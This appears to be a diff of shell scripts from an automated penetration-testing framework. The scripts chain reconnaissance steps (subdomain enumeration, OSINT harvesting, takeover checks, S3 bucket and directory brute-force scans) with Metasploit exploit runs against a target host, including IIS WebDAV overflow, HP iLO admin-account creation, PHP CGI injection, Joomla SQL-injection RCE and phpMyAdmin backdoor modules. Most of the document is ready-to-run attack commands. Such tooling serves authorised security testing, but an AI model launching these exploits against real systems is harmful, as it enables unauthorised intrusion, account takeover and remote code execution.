cat $LOOT_DIR/domains/targets.txt >> /tmp/curl.out 2> /dev/null
|
||||
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
|
||||
rm -f /tmp/curl.out 2> /dev/null
|
||||
echo -e "$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR EMAIL SECURITY $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/spoofcheck/spoofcheck.py $TARGET | tee $LOOT_DIR/nmap/email-$TARGET.txt 2>/dev/null
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED STARTING DOMAIN FLYOVER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
aquatone-discover -d $TARGET -t 100 --wordlist $PLUGINS_DIR/Sublist3r/subdomains.lst | tee $LOOT_DIR/nmap/aquatone-$TARGET-discover 2>/dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-discover > $LOOT_DIR/nmap/aquatone-$TARGET-discover.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-discover 2> /dev/null
|
||||
aquatone-takeover -d $TARGET -t 100 | tee $LOOT_DIR/nmap/aquatone-$TARGET-takeovers 2>/dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-takeovers > $LOOT_DIR/nmap/aquatone-$TARGET-takeovers.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-takeovers 2> /dev/null
|
||||
aquatone-scan -d $TARGET -t 100 -p80,443 | tee $LOOT_DIR/nmap/aquatone-$TARGET-ports 2>/dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-ports > $LOOT_DIR/nmap/aquatone-$TARGET-ports.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-ports 2> /dev/null
|
||||
aquatone-gather -d $TARGET -t 100 | tee $LOOT_DIR/nmap/aquatone-$TARGET-gather.txt 2>/dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-gather > $LOOT_DIR/nmap/aquatone-$TARGET-gather.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-gather 2> /dev/null
|
||||
mkdir -p $LOOT_DIR/aquatone/ 2> /dev/null
|
||||
cp -Rf ~/aquatone/$TARGET $LOOT_DIR/aquatone/
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR SUBDOMAIN HIJACKING $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
dig $TARGET CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
|
||||
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
|
||||
if [ "$SUBOVER" = "1" ]; then
|
||||
cd $PLUGINS_DIR/SubOver/
|
||||
python subover.py -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/subover-$TARGET 2>/dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/subover-$TARGET > $LOOT_DIR/nmap/subover-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/takeovers-$TARGET-subover 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED STARTING PUBLIC S3 BUCKET SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd $PLUGINS_DIR/slurp/
|
||||
./slurp-linux-amd64 domain --domain $TARGET | tee $LOOT_DIR/nmap/takeovers-$TARGET-s3-buckets.txt 2>/dev/null
|
||||
fi
|
||||
111
modes/stealth.sh
111
modes/stealth.sh
|
|
@ -88,97 +88,14 @@ if [ "$MODE" = "stealth" ]; then
|
|||
|
||||
if [ $SCAN_TYPE == "DOMAIN" ];
|
||||
then
|
||||
if [ "$OSINT" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING OSINT INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
theharvester -d $TARGET -l 25 -b all 2> /dev/null
|
||||
metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html
|
||||
fi
|
||||
|
||||
if [ "$RECON" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
whois $TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$SUBLIST3R" = "1" ]; then
|
||||
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$AMASS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA AMASS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
amass -whois -ip -brute -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
|
||||
cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
|
||||
cut -d, -f2 $LOOT_DIR/domains/domains-$TARGET-amass.txt > $LOOT_DIR/domains/domains-$TARGET-amass-ips-sorted.txt
|
||||
fi
|
||||
if [ "$SUBFINDER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBFINDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET 2>/dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$DNSCAN" = "1" ]; then
|
||||
python /pentest/recon/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
|
||||
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
echo ""
|
||||
if [ "$CRTSH" = "1" ]; then
|
||||
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
|
||||
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
|
||||
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKBLUE"
|
||||
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
|
||||
echo ""
|
||||
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
|
||||
fi
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt >> /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-subfinder.txt >> /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/targets.txt >> /tmp/curl.out 2> /dev/null
|
||||
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
|
||||
rm -f /tmp/curl.out 2> /dev/null
|
||||
echo -e "$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR EMAIL SECURITY $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/spoofcheck/spoofcheck.py $TARGET | tee $LOOT_DIR/nmap/dns-$TARGET-email.txt 2>/dev/null
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED STARTING DOMAIN FLYOVER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
aquatone-discover -d $TARGET -t 100 --wordlist $PLUGINS_DIR/Sublist3r/subdomains.lst | tee $LOOT_DIR/nmap/aquatone-$TARGET-discover.txt 2>/dev/null
|
||||
aquatone-takeover -d $TARGET -t 100 | tee $LOOT_DIR/nmap/aquatone-$TARGET-takeovers.txt 2>/dev/null
|
||||
aquatone-scan -d $TARGET -t 100 -p80,443 | tee $LOOT_DIR/nmap/aquatone-$TARGET-ports.txt 2>/dev/null
|
||||
aquatone-gather -d $TARGET -t 100 | tee $LOOT_DIR/nmap/aquatone-$TARGET-gather.txt 2>/dev/null
|
||||
mkdir -p $LOOT_DIR/aquatone/ 2> /dev/null
|
||||
cp -Rf ~/aquatone/$TARGET $LOOT_DIR/aquatone/
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR SUBDOMAIN HIJACKING $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
dig $TARGET CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
|
||||
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
|
||||
if [ "$SUBOVER" = "1" ]; then
|
||||
subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/takeovers-$TARGET-subover.txt 2>/dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED STARTING PUBLIC S3 BUCKET SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd $PLUGINS_DIR/slurp/
|
||||
./slurp-linux-amd64 domain --domain $TARGET | tee $LOOT_DIR/nmap/takeovers-$TARGET-s3-buckets.txt 2>/dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR SUBDOMAIN HIJACKING $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
|
||||
|
||||
source modes/osint.sh
|
||||
source modes/recon.sh
|
||||
|
||||
cd $INSTALL_DIR
|
||||
echo ""
|
||||
fi
|
||||
|
|
@ -220,7 +137,7 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
|
|
@ -228,13 +145,13 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u http://$TARGET -l 1
|
||||
cat /usr/share/blackwidow/$TARGET/$TARGET-urls-sorted.txt >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_QUICK -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FAST -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
|
||||
|
|
@ -277,7 +194,7 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
|
|
@ -285,13 +202,13 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u http://$TARGET -l 1
|
||||
cat /usr/share/blackwidow/$TARGET/$TARGET-urls-sorted.txt >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat /usr/share/blackwidow/$TARGET*/* >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_QUICK -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FAST -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -117,7 +117,7 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u http://$TARGET -l 3 -s y 2> /dev/null
|
||||
cat /usr/share/blackwidow/$TARGET/$TARGET-urls-sorted.txt >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -155,39 +155,47 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd -i $TARGET -p $PORT
|
||||
clusterd -i $TARGET -p $PORT 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; set PATH /uploads/; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; run; use scanner/http/webdav_website_content; run; exit;"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; run; use scanner/http/webdav_website_content; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
|
||||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
|
|||
|
|
@ -127,7 +127,7 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u https://$TARGET -l 3 -s y 2> /dev/null
|
||||
cat /usr/share/blackwidow/$TARGET/$TARGET-urls-sorted.txt >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -140,7 +140,7 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd --ssl -i $TARGET -p $PORT
|
||||
clusterd --ssl -i $TARGET -p $PORT 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -162,41 +162,49 @@ if [ "$MODE" = "webporthttps" ]; then
|
|||
fi
|
||||
cd $INSTALL_DIR
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; set PATH /uploads/; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
